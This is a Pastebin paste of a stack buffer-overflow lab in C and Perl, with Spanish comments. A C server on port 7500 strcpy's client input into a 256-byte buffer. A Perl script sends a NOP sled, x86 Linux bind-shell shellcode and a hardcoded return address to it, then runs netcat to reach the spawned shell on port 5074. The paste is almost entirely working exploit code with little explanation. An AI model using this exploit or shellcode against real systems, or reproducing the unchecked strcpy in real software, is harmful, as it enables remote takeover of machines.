b4nz0k

00

Dec 27th, 2011
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.85 KB | None | 0 0
  1. -------------------Code.c--------------------------------------
  2.  
  3. #include <stdio.h>
  4. #include <stdlib.h>
  5. #include <string.h>
  6. #include <unistd.h>
  7. #include <errno.h>
  8. #include <sys/types.h>
  9. #include <sys/socket.h>
  10. #include <netinet/in.h>
  11.  
  12. #define LISTENPORT 7500
  13. #define BACKLOG 10
  14. #define MSG "Hola, Como estas? "
  15.  
  16. int handle_reply(char *str)
  17. {
  18.     char response[256];
  19.     strcpy(response,str);
  20.    
  21.     printf("El cliente dice: << %s\x0a",response);
  22.     return 0;
  23. }
  24.  
  25. int main(int argc, char * argv[]) {
  26. int sock, conn;
  27.  
  28. struct sockaddr_in my_addr, client_addr;
  29.  
  30. int sockopt_on = 1;
  31. int sa_in_size = sizeof(struct sockaddr_in);
  32. char reply[1024];
  33. //obteniendo el socket
  34. if ((sock = socket(AF_INET, SOCK_STREAM,0)) == -1) {
  35. perror("socket");
  36. exit(1);
  37. }
  38.  
  39. //primer zero de la estructura
  40. memset((char *) &my_addr, 0, sa_in_size);
  41.  
  42. //parte importante
  43. my_addr.sin_family = AF_INET;
  44. my_addr.sin_port = htons(LISTENPORT);
  45.  
  46. my_addr.sin_addr.s_addr = htonl(INADDR_ANY);
  47.  
  48. //bindeando el puerto a nuestro programa
  49. if (bind(sock,(struct sockaddr *)&my_addr, sa_in_size) == -1) {
  50. perror("bind");
  51. exit(1);
  52. }
  53. //iniciando el puerto a la escucha por nuevas conexiones
  54. if (listen(sock,BACKLOG) == -1) {
  55. perror("listen");
  56. exit(1);
  57. }
  58. while(1) {
  59. conn = accept(sock, (struct sockaddr *)&client_addr, &sa_in_size);
  60.  
  61. if (conn == -1) {
  62. perror("accept");
  63. exit(1);
  64. }
  65. //logeando al cliente
  66. printf("Conexion desde: %i\n", inet_ntoa(client_addr.sin_addr));
  67. //enviando el mensaje
  68. send(conn,MSG,strlen(MSG)+1,0);
  69. //obteniendo la respuesta
  70. recv(conn, reply, 1024, 0);
  71. handle_reply(reply);
  72. }
  73. return 0;
  74. }
  75. /*EOF*/
  76.  
  77.  
  78. -----------------------------------Socks.pl---------------------------
  79.  
  80. use IO::Socket;
  81.  
  82. $ip = $ARGV[0];
  83. $nopsled = "\x90" x 176;
  84. #264 + 8 = 268 - 94 = 176
  85. $ebp = "AAAA";
  86. $eip = "\xc0\xf1\xff\xbf";
  87.  
  88. #shellcode de 94 bytes
  89. $shellcode =
  90. "\x31\xc0". "\x50"."\x40"."\x89\xc3"."\x50".
  91. "\x40"."\x50"."\x89\xe1"."\xb0\x66"."\xcd\x80"."\x31\xd2"."\x52".
  92. "\x66\x68\x13\xd2"."\x43"."\x66\x53"."\x89\xe1"."\x6a\x10"."\x51".
  93. "\x50"."\x89\xe1"."\xb0\x66"."\xcd\x80"."\x40"."\x89\x44\x24\x04".
  94. "\x43"."\x43"."\xb0\x66"."\xcd\x80"."\x83\xc4\x0c"."\x52"."\x52".
  95. "\x43"."\xb0\x66"."\xcd\x80"."\x93"."\x89\xd1"."\xb0\x3f"."\xcd\x80".
  96. "\x41"."\x80\xf9\x03"."\x75\xf6"."\x52". "\x68\x6e\x2f\x73\x68".
  97. "\x68\x2f\x2f\x62\x69"."\x89\xe3"."\x52"."\x53"."\x89\xe1".
  98. "\xb0\x0b"."\xcd\x80";
  99.  
  100.  
  101.  
  102. $payload = $nopsled.$shellcode.$eip;
  103.  
  104. if (!$ip) { die "Uso: perl $0 <ip>\n"; }
  105.  
  106. $puerto = '7500';
  107. $protocolo = 'tcp';
  108.  
  109. $socket = IO::Socket::INET->new(
  110.                             PeerAddr => $ip,
  111.                             PeerPort => $puerto,
  112.                             Proto => $protocolo,
  113.                             Timeoud => '1'
  114.                             ) || die "Error de coneccion\n";
  115.                            
  116. print $socket $payload;
  117.  
  118. close ($socket);
  119. print "Payload enviado exitosamente!\n";
  120.  
  121. $comando="nc -vv $ip 5074";
  122. print "\nConectado reverse_shell \n";
  123. system($comando);
Advertisement
Add Comment
Please, Sign In to add comment